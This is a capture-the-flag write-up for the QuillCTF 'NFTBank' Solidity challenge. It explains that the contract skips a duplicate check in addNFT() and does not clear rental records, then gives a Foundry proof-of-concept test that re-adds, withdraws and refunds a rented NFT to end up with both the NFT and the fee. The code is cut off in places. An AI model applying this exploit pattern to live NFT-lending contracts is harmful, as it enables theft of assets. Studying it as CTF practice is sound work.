2023 | Hard | Solidity Security


Objective of CTF

You rent an NFT. After 10 days have passed, if you should hack the contract, and finally have the NFT, the contract should not show, that you have debt.

QuillCTF Challenges - NFTBANK

Vulnerability Description

  • There is no check whether an NFT is already added in the addNFT() function
  • The NFT related record is not deleted after withdrawing the NFT, including nftData and rentData

Attack Steps

  • Approve the NFTBank for spending token and update the NFT config data through addNFT() function
  • Get back the NFT. Since previous rentData is not deleted from rentNFTs, call refund() to get the startRentFee back
  • Get the NFT back again :)

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity ^0.8;

import "forge-std/Test.sol";
import {NFTBank} from "../src/NFTBank.sol";
import {ERC721} from "openzeppelin-contracts/contracts/token/ERC721/ERC721.sol";
import {Ownable} from "openzeppelin-contracts/contracts/access/Ownable.sol";

contract CryptoKitties is ERC721("CryptoKitties", "MEOW"), Ownable {
    function mint(address to, uint id) external onlyOwner {
        _safeMint(to, id);

contract NFTBankHack is Test {
    NFTBank bank;
    CryptoKitties meow;
    address nftOwner = makeAddr("nftOwner");
    address attacker = makeAddr("attacker");

    function setUp() public {
        bank = new NFTBank();
        meow = new CryptoKitties();
        for (uint i; i < 10; i++) {
            meow.mint(nftOwner, i);
            meow.approve(address(bank), i);
            bank.addNFT(address(meow), i, 2 gwei, 500 gwei);

    function test() public {
        vm.deal(attacker, 1 ether);
        bank.rent{value: 500 gwei}(address(meow), 1);
        vm.warp(block.timestamp + 86400 * 10);

        // solution
        meow.setApprovalForAll(address(bank), true);
        bank.addNFT(address(meow), 1, 0, 500 gwei);
        bank.getBackNft(address(meow), 1, payable(attacker));
        bank.refund(address(meow), 1);
        bank.getBackNft(address(meow), 1, payable(attacker));
        // end solution

        assertEq(attacker.balance, 1 ether);
        assertEq(meow.ownerOf(1), attacker);

最后更新: 2023年6月18日 17:16:27
Contributors: YanhuiJessica
